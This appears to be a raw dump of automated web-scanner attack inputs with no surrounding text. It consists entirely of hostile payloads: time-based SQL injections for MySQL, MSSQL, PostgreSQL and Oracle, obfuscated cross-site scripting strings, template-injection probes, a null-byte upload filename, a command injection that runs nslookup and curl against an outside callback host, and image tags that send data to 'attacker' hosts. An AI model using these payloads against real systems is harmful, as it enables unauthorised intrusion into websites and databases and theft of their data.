(select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+'”+(select(0)from(select(sleep(15)))v)+”*/
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%59%39%73%5A%28%39%35%31%31%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
1
555
555
../555
555
555
555
555
555
555
555
555
555
555
1xq9Lpy3xO
|(nslookup -q=cname hitvubatqydky50179.bxss.me||curl hitvubatqydky50179.bxss.me)
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
${@print(md5(31337))}\
555
1oxu9uzB
if(now()=sysdate(),sleep(15),0)
0’XOR(if(now()=sysdate(),sleep(15),0))XOR’Z
0″XOR(if(now()=sysdate(),sleep(15),0))XOR”Z
(select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+'”+(select(0)from(select(sleep(15)))v)+”*/
-1; waitfor delay ‘0:0:15’ —
-1); waitfor delay ‘0:0:15’ —
1 waitfor delay ‘0:0:15’ —
I48MJINw’; waitfor delay ‘0:0:15’ —
-5 OR 308=(SELECT 308 FROM PG_SLEEP(15))–
-5) OR 758=(SELECT 758 FROM PG_SLEEP(15))–
-1)) OR 493=(SELECT 493 FROM PG_SLEEP(15))–
CJyS9CFZ’ OR 435=(SELECT 435 FROM PG_SLEEP(15))–
7YZ6Dmye’) OR 637=(SELECT 637 FROM PG_SLEEP(15))–
oDKqD8rL’)) OR 204=(SELECT 204 FROM PG_SLEEP(15))–
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’
AREDCCAD’)) OR 492=(SELECT 492 FROM PG_SLEEP(15))–
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1
1
1
1
1
1
1
1
1
1
1
555
555
555
1
555
19908789
<th:t="${dfb}#foreach
dfb{{98991*97996}}xca
“dfbzzzzzzzzbbbccccdddeeexca”.replace(“z”,”o”)
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%59%39%73%5A%28%39%35%31%31%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
1
1″ onerror=alert(9238)>
1}body{zzz:Expre/**/SSion(Y9sZ(9164))}
1<img sRc='http://attacker-9227/log.php?
555
1′”()&%UGYl(9031)
555
1
1
555
19141089
1}}”}}’}}1%>”%>’%>
1Q4WM(9918)
1Q4WM(9613)
1″ onerror=alert(9651)>
1}body{zzz:Expre/**/SSion(Q4WM(9391))}
1<img sRc='http://attacker-9353/log.php?
555
1′”()&%AlNY(9870)
555
555